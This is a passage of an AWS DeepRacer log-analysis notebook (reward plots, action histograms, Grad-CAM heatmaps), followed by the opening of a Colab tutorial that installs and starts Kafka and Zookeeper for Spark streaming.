x_offset, y_offset is used to convert to the 0,0 coordinate system
'''
track = np.zeros(track_size) # lets magnify the track by *100
for index, row in df.iterrows():
x = int(row["x"]) + x_offset
y = int(row["y"]) + y_offset
reward = row["reward"]
track[y,x] = reward
fig = plt.figure(1, figsize=(12, 16))
ax = fig.add_subplot(111)
print_border(ax, center_line, inner_border, outer_border)
return track
def plot_top_laps(sorted_idx, n_laps=5):
fig = plt.figure(n_laps, figsize=(12, 30))
for i in range(n_laps):
idx = sorted_idx[i]
episode_data = episode_map[idx]
ax = fig.add_subplot(n_laps,1,i+1)
line = LineString(center_line)
plot_coords(ax, line)
plot_line(ax, line)
line = LineString(inner_border)
plot_coords(ax, line)
plot_line(ax, line)
line = LineString(outer_border)
plot_coords(ax, line)
plot_line(ax, line)
for idx in range(1, len(episode_data)-1):
x1,y1,action,reward,angle,speed = episode_data[idx]
car_x2, car_y2 = x1 - 0.02, y1
plt.plot([x1*100, car_x2*100], [y1*100, car_y2*100], 'b.')
return fig
###Output
_____no_output_____
###Markdown
Load the training log
###Code
data = load_data(fname)
df = convert_to_pandas(data)
df.head()
df['y'].min(), df['y'].max()
# Normalize the rewards to a 0-1 scale
from sklearn.preprocessing import MinMaxScaler
min_max_scaler = MinMaxScaler()
scaled_vals = min_max_scaler.fit_transform(df['reward'].values.reshape(df['reward'].values.shape[0], 1))
df['reward'] = pd.DataFrame(scaled_vals.squeeze())
df['reward'].min(), df['reward'].max()
###Output
_____no_output_____
###Markdown
Plot rewards per IterationThis graph is useful to understand the mean reward and standard deviation within each episode
###Code
REWARD_THRESHOLD = 100
# reward graph per episode
min_episodes = np.min(df['episode'])
max_episodes = np.max(df['episode'])
print('Number of episodes = ', max_episodes)
total_reward_per_episode = list()
for epi in range(min_episodes, max_episodes):
df_slice = df[df['episode'] == epi]
total_reward_per_episode.append(np.sum(df_slice['reward']))
average_reward_per_iteration = list()
deviation_reward_per_iteration = list()
buffer_rew = list()
for val in total_reward_per_episode:
buffer_rew.append(val)
if len(buffer_rew) == 20:
average_reward_per_iteration.append(np.mean(buffer_rew))
deviation_reward_per_iteration.append(np.std(buffer_rew))
# reset
buffer_rew = list()
fig = plt.figure(figsize=(6, 12))
ax = fig.add_subplot(311)
ax.plot(np.arange(len(average_reward_per_iteration)), average_reward_per_iteration, '.')
ax.set_title('Rewards per Iteration')
ax.set_ylabel('Mean reward')
ax.set_xlabel('Iteration')
for rr in range(len(average_reward_per_iteration)):
if average_reward_per_iteration[rr] >= REWARD_THRESHOLD :
ax.plot(rr, average_reward_per_iteration[rr], 'r.')
plt.grid(True)
ax = fig.add_subplot(312)
ax.plot(np.arange(len(deviation_reward_per_iteration)), deviation_reward_per_iteration, '.')
ax.set_ylabel('Dev of reward')
ax.set_xlabel('Iteration')
plt.grid(True)
for rr in range(len(average_reward_per_iteration)):
if average_reward_per_iteration[rr] >= REWARD_THRESHOLD:
ax.plot(rr, deviation_reward_per_iteration[rr], 'r.')
ax = fig.add_subplot(313)
ax.plot(np.arange(len(total_reward_per_episode)), total_reward_per_episode, '.')
ax.set_ylabel('Total reward')
ax.set_xlabel('Episode')
###Output
Number of episodes = 20
###Markdown
Analyze the reward distribution for your reward function
###Code
# add y_offset to bring everything to the positive axis
y_offset = int(df['y'].min())
if y_offset > 0: # if positive, just keep it the same
y_offset = 0
y_offset = abs(y_offset)
inner_border[:,1] = inner_border[:,1] + y_offset
center_line[:,1] = center_line[:,1] + y_offset
outer_border[:,1] = outer_border[:,1] + y_offset
#NOTE: For the Tokyo track use this dimentions
#track = plot_track(df, track_size=(700, 1000), x_offset=0, y_offset=y_offset)
#plt.title("Reward distribution for all actions ")
#im = plt.imshow(track, cmap='hot', interpolation='bilinear', origin="lower")
track = plot_track(df)
plt.title("Reward distribution for all actions ")
im = plt.imshow(track, cmap='hot', interpolation='bilinear', origin="lower")
###Output
_____no_output_____
###Markdown
Plot a particular iteration
###Code
iteration_id = 36
track = plot_track(df[df['iteration'] == iteration_id])
plt.title("Reward distribution for all actions ")
im = plt.imshow(track, cmap='hot', interpolation='bilinear', origin="lower")
###Output
_____no_output_____
###Markdown
Path taken for top reward iterationsNOTE: in a single episode, the car can go around multiple laps, the episode is terminated when car completes 1000 steps
###Code
action_map, episode_map, sorted_idx = episode_parser(data)
fig = plot_top_laps(sorted_idx[:], 3)
###Output
_____no_output_____
###Markdown
Path taken in a particular episode
###Code
## Evaluation RUN
def plot_episode_run(df, E):
fig = plt.figure(1, figsize=(12, 16))
ax = fig.add_subplot(211)
print_border(ax, center_line, inner_border, outer_border)
episode_data = df[df['episode'] == E]
for row in episode_data.iterrows():
x1,y1,action,reward = row[1]['x'], row[1]['y'], row[1]['action'], row[1]['reward']
car_x2, car_y2 = x1 - 0.02, y1
plt.plot([x1, car_x2], [y1, car_y2], 'r.')
plot_episode_run(df, E=500) # arbitrary episode
###Output
_____no_output_____
###Markdown
Path taken in a particular Iteration
###Code
iteration_id = 20
EPISODE_PER_ITER = 30 #number of episodes per iteration as defined in your hyperparameters
for i in range((iteration_id-1)*EPISODE_PER_ITER, (iteration_id)*EPISODE_PER_ITER):
plot_episode_run(df, E=i)
###Output
/home/ccsantos/anaconda3/lib/python3.7/site-packages/ipykernel_launcher.py:4: MatplotlibDeprecationWarning: Adding an axes using the same arguments as a previous axes currently reuses the earlier instance. In a future version, a new instance will always be created and returned. Meanwhile, this warning can be suppressed, and the future behavior ensured, by passing a unique label to each axes instance.
after removing the cwd from sys.path.
###Markdown
Action breakdown per iteration and historgram for action distribution for each of the turns - reinvent trackThis plot is useful to understand the actions that the model takes for any given iteration.** NOTE: This is only supported for reinvent track currently **
###Code
fig = plt.figure(figsize=(16, 24))
iterations_downselect = [iteration_id] ## Lets pick the iteratons with the highest rewards
# Track Segment Labels
action_names = ['LEFT', 'RIGHT', 'STRAIGHT', 'SLIGHT LEFT', 'SLIGHT RIGHT', 'SLOW']
vert_lines = [10,25,32,33,40,45,50,53,61,67]
track_segments = [(15, 100, 'hairpin'),
(32, 100, 'right'),
(42, 100, 'left'),
(51, 100, 'left'),
(63, 100, 'left')]
segment_x = np.array([15, 32, 42, 51, 63])
segment_y = np.array([0, 0, 0, 0, 0])
segment_xerr = np.array([[5, 1, 2, 1, 2], [10, 1, 3, 2, 4]])
segment_yerr = np.array([[0, 0, 0, 0, 0], [150, 150, 150, 150, 150]])
wpts_array = center_line
for iter_num in iterations_downselect:
# Slice the data frame to get all episodes in that iteration
df_iter = df[(iter_num == df['iteration'])]
n_steps_in_iter = len(df_iter)
print('Number of steps in iteration=', n_steps_in_iter)
th = 0.8
for idx in range(len(action_names)):
ax = fig.add_subplot(6, 2, 2*idx+1)
print_border(ax, center_line, inner_border, outer_border)
df_slice = df_iter[df_iter['reward'] >= th]
df_slice = df_slice[df_slice['action'] == idx]
ax.plot(df_slice['x'], df_slice['y'], 'b.')
for idWp in vert_lines:
ax.text(wpts_array[idWp][0], wpts_array[idWp][1]+20, str(idWp), bbox=dict(facecolor='red', alpha=0.5))
#ax.set_title(str(log_name_id) + '-' + str(iter_num) + ' w rew >= '+str(th))
ax.set_ylabel(action_names[idx])
# calculate action way point distribution
action_waypoint_distribution = list()
for idWp in range(len(wpts_array)):
action_waypoint_distribution.append(len(df_slice[df_slice['closest_waypoint'] == idWp]))
ax = fig.add_subplot(6, 2, 2 * idx + 2)
# Call function to create error boxes
_ = make_error_boxes(ax, segment_x, segment_y, segment_xerr, segment_yerr)
for tt in range(len(track_segments)):
ax.text(track_segments[tt][0], track_segments[tt][1], track_segments[tt][2])
ax.bar(np.arange(len(wpts_array)), action_waypoint_distribution)
ax.set_xlabel('waypoint')
ax.set_ylabel('# of actions')
ax.legend([action_names[idx]])
ax.set_ylim((0, 150))
###Output
Number of steps in iteration= 0
###Markdown
Lets analyze the hairpin turn for the best iteration. We see that the model like to take Slight left and Straight over other actions, we see that slight right and right actions frequency is very low in comparison. In short, this model seems to do well for the hairpin turn Simulation Image Analysis - Probability distribution on decisions (actions)is the model making decisions that are "too close" or is it confident for the laps it finishes. if the top and second best decisions are far apart, the model must likely be making more confident decisions
###Code
import glob
img_path = "simulation_episode/"
all_files = sorted(glob.glob(img_path + '/*.png'))
!grep "S3 bucket" $fname
!grep "S3 prefix" $fname
###Output
S3 bucket: aws-deepracer-0366eb7d-d338-48e6-b5b3-3a1fc7e3681e
S3 prefix: DeepRacer-SageMaker-RoboMaker-comm-251199395322-20190819134948-3a1a4c3e-b32a-44f3-b333-221a2fb216d3
###Markdown
Download all the checkpoints (provided as an example). We recommend downloading only the ones you are interested in
###Code
##!aws s3 sync s3://$s3_bucket/$s3_prefix/model/ intermediate_checkpoint/ --exclude "*" --include "*model_*"
## For this example lets download all models in interation in the 30s
## NOTE: Copy the variables from the output of the grep command
s3_bucket = ''
s3_prefix = ''
!aws s3 sync s3://$s3_bucket/$s3_prefix/model/ intermediate_checkpoint/ --exclude "*" --include "*model_3*"
import tensorflow as tf
import numpy as np
from tensorflow.python.platform import gfile
from PIL import Image
GRAPH_PB_PATH = 'intermediate_checkpoint/'
def load_session(pb_path):
sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True,
log_device_placement=True))
print("load graph:", pb_path)
with gfile.FastGFile(pb_path,'rb') as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
sess.graph.as_default()
tf.import_graph_def(graph_def, name='')
graph_nodes=[n for n in graph_def.node]
names = []
for t in graph_nodes:
names.append(t.name)
x = sess.graph.get_tensor_by_name('main_level/agent/main/online/network_0/observation/observation:0')
y = sess.graph.get_tensor_by_name('main_level/agent/main/online/network_1/ppo_head_0/policy:0')
return sess, x, y
def rgb2gray(rgb):
return np.dot(rgb[...,:3], [0.299, 0.587, 0.114])
!ls $GRAPH_PB_PATH
model_inference = []
iterations = [30, 36]
for ii in iterations:
model, obs, model_out = load_session(GRAPH_PB_PATH + 'model_%s.pb' % ii)
arr = []
for f in all_files[:]:
img = Image.open(f)
img_arr = np.array(img)
img_arr = rgb2gray(img_arr)
img_arr = np.expand_dims(img_arr, axis=2)
current_state = {"observation": img_arr} #(1, 120, 160, 1)
y_output = model.run(model_out, feed_dict={obs:[img_arr]})[0]
arr.append (y_output)
model_inference.append(arr)
model.close()
tf.reset_default_graph()
prob_diff = []
for mi in model_inference[0]:
max1, max2 = mi.argsort()[-2:][::-1]
prob_diff.append(mi[max1] - mi[max2])
plt.hist(prob_diff)
prob_diff = []
for mi in model_inference[1]:
max1, max2 = mi.argsort()[-2:][::-1]
prob_diff.append(mi[max1] - mi[max2])
plt.hist(prob_diff)
###Output
_____no_output_____
###Markdown
model 36 appears to have a better seperation in probabability, hence may work better in sim2real experiments Model CSV AnalysisDownload the model from the console AWS DeepRacer > Reinforcement learning > $Training Job Name$ > Download Model
###Code
fname = 'intermediate_checkpoint/worker_0.simple_rl_graph.main_level.main_level.agent_0.csv'
df_csv = pd.read_csv(fname)
df_csv.columns
title = "Training"
df_csv.plot(x='Training Iter', y='Training Reward', style='.',
title=title)
df_csv['Episode Length'].plot()
###Output
_____no_output_____
###Markdown
Evaluation Run AnalyisDebug your evaluation runs or analyze the laps
###Code
eval_sim = 'sim-h712thgp6gz2'
eval_fname = 'deepracer-eval-%s.log' % eval_sim
cw_utils.download_log(eval_fname, stream_prefix=eval_sim)
!head $eval_fname
eval_fname = 'logs/deepracer-eval-sim-sample.log'
eval_data = load_data(eval_fname)
eval_df = convert_to_pandas(eval_data, None)
eval_df.head()
###Output
_____no_output_____
###Markdown
Grid World Analysis Understand the speed of the car along with the path on a per episode basis. This can help you debug portions of the track where the car may not be going fast. Hence giving you hints on how to improve your reward function.
###Code
N_EPISODES = 3
for e in range(N_EPISODES):
print ("Episode #%s " %e)
episode_df = eval_df[eval_df['episode'] == e]
plot_grid_world(episode_df, inner_border, outer_border, scale=5.0)
print ("###############################################################\n\n")
###Output
_____no_output_____
###Markdown
What is the model looking at?Gradcam: visual heatmap of where the model is looking to make its decisions. based on https://arxiv.org/pdf/1610.02391.pdf
###Code
import cv2
import numpy as np
import tensorflow as tf
def visualize_gradcam_discrete_ppo(sess, rgb_img, category_index=0, num_of_actions=6):
'''
@inp: model session, RGB Image - np array, action_index, total number of actions
@return: overlayed heatmap
'''
img_arr = np.array(img)
img_arr = rgb2gray(img_arr)
img_arr = np.expand_dims(img_arr, axis=2)
x = sess.graph.get_tensor_by_name('main_level/agent/main/online/network_0/observation/observation:0')
y = sess.graph.get_tensor_by_name('main_level/agent/main/online/network_1/ppo_head_0/policy:0')
feed_dict = {x:[img_arr]}
#Get he policy head for clipped ppo in coach
model_out_layer = sess.graph.get_tensor_by_name('main_level/agent/main/online/network_1/ppo_head_0/policy:0')
loss = tf.multiply(model_out_layer, tf.one_hot([category_index], num_of_actions))
reduced_loss = tf.reduce_sum(loss[0])
conv_output = sess.graph.get_tensor_by_name('main_level/agent/main/online/network_1/observation/Conv2d_4/Conv2D:0')
grads = tf.gradients(reduced_loss, conv_output)[0]
output, grads_val = sess.run([conv_output, grads], feed_dict=feed_dict)
weights = np.mean(grads_val, axis=(1, 2))
cams = np.sum(weights * output, axis=3)
##im_h, im_w = 120, 160##
im_h, im_w = rgb_img.shape[:2]
cam = cams[0] #img 0
image = np.uint8(rgb_img[:, :, ::-1] * 255.0) # RGB -> BGR
cam = cv2.resize(cam, (im_w, im_h)) # zoom heatmap
cam = np.maximum(cam, 0) # relu clip
heatmap = cam / np.max(cam) # normalize
cam = cv2.applyColorMap(np.uint8(255 * heatmap), cv2.COLORMAP_JET) # grayscale to color
cam = np.float32(cam) + np.float32(image) # overlay heatmap
cam = 255 * cam / (np.max(cam) + 1E-5) ## Add expsilon for stability
cam = np.uint8(cam)[:, :, ::-1] # to RGB
return cam
import glob
img_path = "simulation_episode/"
all_files = sorted(glob.glob(img_path + '/*.png'))
model_path = GRAPH_PB_PATH + 'model_30.pb' #Change this to your model 'pb' frozen graph file
model, obs, model_out = load_session(model_path)
heatmaps = []
for f in all_files[:5]:
img = np.array(Image.open(f))
heatmap = visualize_gradcam_discrete_ppo(model, img, category_index=0, num_of_actions=10)
heatmaps.append(heatmap)
tf.reset_default_graph()
plt.imshow(heatmaps[0])
###Output
_____no_output_____ |
_notebooks/2021-06-25-kafka-spark-streaming-colab.ipynb | ###Markdown
Kafka and Spark Streaming in Colab> Installing Kafka and Spark streaming in colab and streaming movielens dataset- toc: true- badges: true- comments: true- categories: [spark, pyspark, kafka, movie]- image:  There are several benefits of implementing Spark-Kafka integration. You can ensure minimum data loss through Spark Streaming while saving all the received Kafka data synchronously for an easy recovery. Users can read messages from a single topic or multiple Kafka topics. Along with this level of flexibility you can also access high scalability, throughput and fault-tolerance and a range of other benefits by using Spark and Kafka in tandem. This integration can be understood with a data pipeline that functions in the methodology shown below: 
###Code
!pip install kafka-python
###Output
Collecting kafka-python
[?25l Downloading https://files.pythonhosted.org/packages/75/68/dcb0db055309f680ab2931a3eeb22d865604b638acf8c914bedf4c1a0c8c/kafka_python-2.0.2-py2.py3-none-any.whl (246kB)
[K |█▎ | 10kB 12.5MB/s eta 0:00:01
[K |██▋ | 20kB 18.6MB/s eta 0:00:01
[K |████ | 30kB 20.3MB/s eta 0:00:01
[K |█████▎ | 40kB 16.8MB/s eta 0:00:01
[K |██████▋ | 51kB 9.2MB/s eta 0:00:01
[K |████████ | 61kB 10.6MB/s eta 0:00:01
[K |█████████▎ | 71kB 8.7MB/s eta 0:00:01
[K |██████████▋ | 81kB 9.3MB/s eta 0:00:01
[K |████████████ | 92kB 10.2MB/s eta 0:00:01
[K |█████████████▎ | 102kB 7.0MB/s eta 0:00:01
[K |██████████████▋ | 112kB 7.0MB/s eta 0:00:01
[K |████████████████ | 122kB 7.0MB/s eta 0:00:01
[K |█████████████████▎ | 133kB 7.0MB/s eta 0:00:01
[K |██████████████████▋ | 143kB 7.0MB/s eta 0:00:01
[K |████████████████████ | 153kB 7.0MB/s eta 0:00:01
[K |█████████████████████▎ | 163kB 7.0MB/s eta 0:00:01
[K |██████████████████████▋ | 174kB 7.0MB/s eta 0:00:01
[K |████████████████████████ | 184kB 7.0MB/s eta 0:00:01
[K |█████████████████████████▎ | 194kB 7.0MB/s eta 0:00:01
[K |██████████████████████████▋ | 204kB 7.0MB/s eta 0:00:01
[K |████████████████████████████ | 215kB 7.0MB/s eta 0:00:01
[K |█████████████████████████████▎ | 225kB 7.0MB/s eta 0:00:01
[K |██████████████████████████████▋ | 235kB 7.0MB/s eta 0:00:01
[K |████████████████████████████████| 245kB 7.0MB/s eta 0:00:01
[K |████████████████████████████████| 256kB 7.0MB/s
[?25hInstalling collected packages: kafka-python
Successfully installed kafka-python-2.0.2
###Markdown
Import packages
###Code
import os
from datetime import datetime
import time
import threading
import json
from kafka import KafkaProducer
from kafka.errors import KafkaError
import pandas as pd
from sklearn.model_selection import train_test_split
###Output
_____no_output_____
###Markdown
Download and setup Kafka and Zookeeper instancesFor demo purposes, the following instances are setup locally:- Kafka (Brokers: 127.0.0.1:9092)- Zookeeper (Node: 127.0.0.1:2181)
###Code
!curl -sSOL https://downloads.apache.org/kafka/2.7.0/kafka_2.13-2.7.0.tgz
!tar -xzf kafka_2.13-2.7.0.tgz
###Output
_____no_output_____
###Markdown
Using the default configurations (provided by Apache Kafka) for spinning up the instances.
###Code
!./kafka_2.13-2.7.0/bin/zookeeper-server-start.sh -daemon ./kafka_2.13-2.7.0/config/zookeeper.properties
!./kafka_2.13-2.7.0/bin/kafka-server-start.sh -daemon ./kafka_2.13-2.7.0/config/server.properties
!echo "Waiting for 10 secs until kafka and zookeeper services are up and running"
!sleep 10
###Output
Waiting for 10 secs until kafka and zookeeper services are up and running
###Markdown
Once the instances are started as daemon processes, grep for `kafka` in the processes list. The two java processes correspond to zookeeper and the kafka instances.
###Code
!ps -ef | grep kafka
###Output
root 406 359 5 04:12 ? 00:00:16 /usr/lib/jvm/java-8-openjdk-amd64/bin/java -cp /content/spark-3.1.2-bin-hadoop3.2/conf/:/content/spark-3.1.2-bin-hadoop3.2/jars/* -Xmx1g org.apache.spark.deploy.SparkSubmit --conf spark.jars.packages=org.apache.spark:spark-sql-kafka-0-10_2.11:2.4.5 pyspark-shell
root 901 1 11 04:17 ? 00:00:01 /usr/lib/jvm/java-8-openjdk-amd64/bin/java -Xmx512M -Xms512M -server -XX:+UseG1GC -XX:MaxGCPauseMillis=20 -XX:InitiatingHeapOccupancyPercent=35 -XX:+ExplicitGCInvokesConcurrent -XX:MaxInlineLevel=15 -Djava.awt.headless=true -Xloggc:/content/kafka_2.13-2.7.0/bin/../logs/zookeeper-gc.log -verbose:gc -XX:+PrintGCDetails -XX:+PrintGCDateStamps -XX:+PrintGCTimeStamps -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=10 -XX:GCLogFileSize=100M -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false -Dkafka.logs.dir=/content/kafka_2.13-2.7.0/bin/../logs -Dlog4j.configuration=file:./kafka_2.13-2.7.0/bin/../config/log4j.properties -cp /content/kafka_2.13-2.7.0/bin/../libs/activation-1.1.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/aopalliance-repackaged-2.6.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/argparse4j-0.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/audience-annotations-0.5.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/commons-cli-1.4.jar:/content/kafka_2.13-2.7.0/bin/../libs/commons-lang3-3.8.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-api-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-basic-auth-extension-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-file-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-json-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-mirror-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-mirror-client-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-runtime-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-transforms-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/hk2-api-2.6.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/hk2-locator-2.6.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/hk2-utils-2.6.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-annotations-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-core-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-databind-2.10.5.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-dataformat-csv-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-datatype-jdk8-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-jaxrs-base-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-jaxrs-json-provider-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-module-jaxb-annotations-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-module-paranamer-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-module-scala_2.13-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.activation-api-1.2.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.annotation-api-1.3.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.inject-2.6.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.validation-api-2.0.2.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.ws.rs-api-2.1.6.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.xml.bind-api-2.3.2.jar:/content/kafka_2.13-2.7.0/bin/../libs/javassist-3.25.0-GA.jar:/content/kafka_2.13-2.7.0/bin/../libs/javassist-3.26.0-GA.jar:/content/kafka_2.13-2.7.0/bin/../libs/javax.servlet-api-3.1.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/javax.ws.rs-api-2.1.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/jaxb-api-2.3.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-client-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-common-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-container-servlet-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-container-servlet-core-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-hk2-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-media-jaxb-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-server-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-client-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-continuation-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-http-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-io-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-security-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-server-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-servlet-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-servlets-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-util-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jopt-simple-5.0.4.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka_2.13-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka_2.13-2.7.0-sources.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-clients-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-log4j-appender-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-raft-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-streams-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-streams-examples-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-streams-scala_2.13-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-streams-test-utils-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-tools-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/log4j-1.2.17.jar:/content/kafka_2.13-2.7.0/bin/../libs/lz4-java-1.7.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/maven-artifact-3.6.3.jar:/content/kafka_2.13-2.7.0/bin/../libs/metrics-core-2.2.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-buffer-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-codec-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-common-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-handler-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-resolver-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-transport-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-transport-native-epoll-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-transport-native-unix-common-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/osgi-resource-locator-1.0.3.jar:/content/kafka_2.13-2.7.0/bin/../libs/paranamer-2.8.jar:/content/kafka_2.13-2.7.0/bin/../libs/plexus-utils-3.2.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/reflections-0.9.12.jar:/content/kafka_2.13-2.7.0/bin/../libs/rocksdbjni-5.18.4.jar:/content/kafka_2.13-2.7.0/bin/../libs/scala-collection-compat_2.13-2.2.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/scala-java8-compat_2.13-0.9.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/scala-library-2.13.3.jar:/content/kafka_2.13-2.7.0/bin/../libs/scala-logging_2.13-3.9.2.jar:/content/kafka_2.13-2.7.0/bin/../libs/scala-reflect-2.13.3.jar:/content/kafka_2.13-2.7.0/bin/../libs/slf4j-api-1.7.30.jar:/content/kafka_2.13-2.7.0/bin/../libs/slf4j-log4j12-1.7.30.jar:/content/kafka_2.13-2.7.0/bin/../libs/snappy-java-1.1.7.7.jar:/content/kafka_2.13-2.7.0/bin/../libs/zookeeper-3.5.8.jar:/content/kafka_2.13-2.7.0/bin/../libs/zookeeper-jute-3.5.8.jar:/content/kafka_2.13-2.7.0/bin/../libs/zstd-jni-1.4.5-6.jar org.apache.zookeeper.server.quorum.QuorumPeerMain ./kafka_2.13-2.7.0/config/zookeeper.properties
root 1254 1 57 04:17 ? 00:00:05 /usr/lib/jvm/java-8-openjdk-amd64/bin/java -Xmx1G -Xms1G -server -XX:+UseG1GC -XX:MaxGCPauseMillis=20 -XX:InitiatingHeapOccupancyPercent=35 -XX:+ExplicitGCInvokesConcurrent -XX:MaxInlineLevel=15 -Djava.awt.headless=true -Xloggc:/content/kafka_2.13-2.7.0/bin/../logs/kafkaServer-gc.log -verbose:gc -XX:+PrintGCDetails -XX:+PrintGCDateStamps -XX:+PrintGCTimeStamps -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=10 -XX:GCLogFileSize=100M -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false -Dkafka.logs.dir=/content/kafka_2.13-2.7.0/bin/../logs -Dlog4j.configuration=file:./kafka_2.13-2.7.0/bin/../config/log4j.properties -cp /content/kafka_2.13-2.7.0/bin/../libs/activation-1.1.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/aopalliance-repackaged-2.6.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/argparse4j-0.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/audience-annotations-0.5.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/commons-cli-1.4.jar:/content/kafka_2.13-2.7.0/bin/../libs/commons-lang3-3.8.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-api-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-basic-auth-extension-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-file-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-json-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-mirror-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-mirror-client-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-runtime-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-transforms-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/hk2-api-2.6.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/hk2-locator-2.6.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/hk2-utils-2.6.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-annotations-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-core-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-databind-2.10.5.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-dataformat-csv-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-datatype-jdk8-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-jaxrs-base-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-jaxrs-json-provider-2.10.5.jar:/content/k